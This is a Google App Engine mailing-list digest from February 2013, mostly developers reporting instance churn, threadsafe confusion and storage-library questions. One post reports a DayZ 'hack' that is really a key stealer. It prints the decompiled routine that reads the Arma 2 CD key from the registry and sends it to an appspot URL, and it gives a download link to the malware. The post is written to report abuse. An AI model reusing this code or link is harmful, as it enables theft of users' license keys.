[google-appengine] Instance issues

2013-02-26 Thread Tomas
From yesterday I observe that app engine spins new instance which serves
requests for couple of seconds and then kill it immediately again. Can't
see anything in logs, the spin up time also raised from usual 5-6sec to 18+
secs. That basically means that user faces 20secs timeout on each click.
And as usually, GAE status all green. What's happening?

[google-appengine] Re: New client library for Google Cloud Storage available for testing

2013-02-26 Thread Shane Bell
Hi Tom,

What's the plan with the existing com.google.appengine.api.files classes?
I'm about to start work on some code to access Google Cloud Storage. Should
I be using the existing Files API or the GCS client library? Is one method
preferred over the other?

I haven't been able to get the Files API to work when running locally. I
see your library has a LocalRawGcsServiceFactory for this purpose. This
alone seems like a good reason to be using your library.

Thanks,
Shane.

 *Greetings,

the Files API, but provides key stability improvements and a better overall

My theory is that the existence of a previous Google Apps account under

I realize this is a problem better suited to private customer support, but

[google-appengine] threadsafe not working

2013-02-26 Thread Jerome O'Flaherty
Guys,
I have marked my application as threadsafe but it does not seem to every
call the application multiple times, rather the App Engine always create a
new instance. I have tested this by basically sleeping for 20 seconds on
one request (the application implemented a Jersey REST service) and with
nothing else being executed all new requests cause the App engine to launch
a new instance, in fact multiple new instances?

Is there something else I need to do to allow a single instance handle
multiple requests? Its seems to be a complete waste and more/less causes
the app engine to be much more expensive than it needs to be.

All help appreciated.

Thanks

Jerome

  Hi,

I'm working on a project that consists of a REST service that's
running in GAE. It's simple and written in Python with the webapp
framework. I've noticed a problem where the first request to the
application always returns an empty body with an HTTP status code of
  200. I'm seeing this problem in both the dev server on my machine and
when the app is uploaded to GAE.

The app has just one get method and one post method. These are used to
add and view things in the datastore at the URI that the client is
accessing. If the data is not in the data store when a client tries to
GET it, the app should return a 404 and no body. If the data is there
it should return the data in the body of the response with an HTTP
status of 200. A POST works similarly; HTTP 200 with some data in the
body if we can update the datastore and a 500 error if there was a
problem. This works after the first request to the dev server or an
instance, but the first request is always returned with an empty body
and a status code of 200.

This happens with a GET or a POST to a known good URI or even to a
completely random URI that should be a 404.

I have tried to debug this by using logging to see where the app is
getting hung up, but strangely enough it doesn't even seem to be
executing my code on the first request. Is there anything I should be
looking out for here? How can I troubleshoot this?

  Thanks,

[google-appengine] Web application and Google App Engine accounts

2013-02-26 Thread Azamat Turgunbaev

Sorry if someone already asked such question. I have searched, but no

I am developing a web application on Java( JSF 2.0 ). I have another
application that runs on Google App Engine. For my web application that I
am developing I want to provide a log in screen that will authorize the
users from my Google App Engine application accounts. And they can you both
services provided by my Java application and Google App Engine application.
In other words I want to integrate two applications that will run on
different servers, such that accounts on Google App Engine can manage my
Java application. Please advice how can I achieve that? From what should I
start?

P.S: I am new to Google App Engine

[google-appengine] User use app engine to store stolen keys from videogame.

2013-02-26 Thread Igor Macallister
Recently a video on YouTube (http://www.youtube.com/watch?v=i3WTLBHGxJg)
shows a hack for Arma 2 - DayZ, the download contain a dangerous file,
what it makes is to take the installation key of Arma 2 from the victim,
send to Internet, and then replaces the victim's key with a banned one, and
add Everyone cant edit/read the section of the Arma 2 key in the registry
to prevent victim to change the key.

This is the link of the file:
http://www.mediafire.com/?46wy99z7fwpmlrk

After decompiling his hack (keystealer):

   Private Shared Sub SendKey()
Dim key As RegistryKey
Try
key = Registry.LocalMachine.OpenSubKey(Software\Bohemia
Interactive Studio\ArmA 2 OA, True)
Catch exception1 As Exception
key = Nothing
End Try
If (Not key Is Nothing) Then
Dim buffer As Byte() = DirectCast(key.GetValue(KEY),
Byte())
Program.keys = (CD Key:   BitConverter.ToString(buffer)
 ChrW(10))
Try

WebRequest.Create((http://cybermitodb.appspot.com/key?s=;
Program.keys)).GetResponse
Catch exception2 As Exception
End Try
End If
End Sub

So, I am sure that if you analyze http://cybermitodb.appspot.com and the
email of this user you will find a lot of evidence of his key stealer (like
a bunch of stolen keys, and contact info for selling them).

[google-appengine] DEPLOYING OVER EU DATACENTERS WITHOUT PREMIUM ACCOUNT

2013-02-26 Thread Miguel PersonToVehicle
Hi,

I filled the form to get the EU allocation feature for our GAE applications
almost 2 weeks ago- waiting for the response. It's a really good movement
from Google not requiring the Premium account to deploy in EU as the legal
framework here is a big issue.

I'd appreciate if anyone could comment anything about the experience on
getting the Google approval: timing and chances to be accepted. Also if
there is some way to track the request as I haven´t received anything, not
even an ACK.

We are willing to deploy our apps as soon as possible and want to do it
directly in EU datacenters to avoid future migrations,

Many thanks!

[google-appengine] Serious Serving Problemns

2013-02-26 Thread johnP
Yesterday to a lesser extent, and today to a very serious degree, we have
been seeing very extreme serving problems. This is for an application that
has been running very stably and well for a long time.

Many user-facing 500 errors that never hit our code.
Many deadline exceeded errors.
Instances are being killed very aggressively.
I'm seeing zero resident instances, although I have set a minimum in apps
settings.
Instances are taking inordinately long to spool up.

All this is combining to bring our app to its knees. This is a Master/Slave
paid application.

Yeah sorry - I'm using pure java (servlets/jsps) on HR datastore, the user
facing app is on http://www.librarist.com/ (which is spring mvc deployed on
appfog talking with app engine backend). All day today I see a lot of app
instance to be started and killed within few seconds, none of them have
more than 200 requests processed - usually my dynamic instances serve ~50k
requests in their live.

And the best part is that google is going to charge me extra for the CPU (I
know it's few cents but what an irony) which they waste on spining/killing
those instances while they just could run one dynamic forever which is
usually able to server whatever my app needs.

sorry to hear about that by the way I am using only go for a few
months and there was only 1 major down time back into late 2012. Never had
problem with my instance.. at least they run for a few minutes before
killed.

perhaps the stability issue is depending on the language?

By the way, I have configured the performance settings like this as my
traffic is quite stable:

Idle Instances: ( Automatic – 1 )
Pending Latency: ( Automatic – Automatic )

Wonder how you set it?

And the best part is that google is going to charge me extra for the CPU
(I know it's few cents but what an irony) which they waste on
spining/killing those instances while they just could run one dynamic
forever which is usually able to server whatever my app needs.

it seems to me every time when someone reported a problem, it luckily
didn't happen to me. So I wonder if usually GAE got problem for some
accounts only. Are you a paid user?

From yesterday I observe that app engine spins new instance which serves
requests for couple of seconds and then kill it immediately again. Can't
see anything in logs, the spin up time also raised from usual 5-6sec to 18+
secs. That basically means that user faces 20secs timeout on each click.
And as usually, GAE status all green. What's happening?

By the way, I'm go user and luckily didn't encounter such situation.
How much requests / second you usually have? (I'm asking to making sure
it's not because there is no http request... as the instance auto shut down
if no one use it...and spin up once there are http request).

Hi Lawrence,

We get about 2.5 requests / second so it's not the auto shutdown.

Kind regards,

Richard Druce

I've got similar usage as yours,

By the way, I have configured the performance settings like this:

Idle Instances: ( Automatic – 1 )
Pending Latency: ( Automatic – Automatic )

Wonder how you configured it (or you may try setting it like mines..),
if the problem still exist perhaps we can conclude the problem is dependent
on the type of language engine.
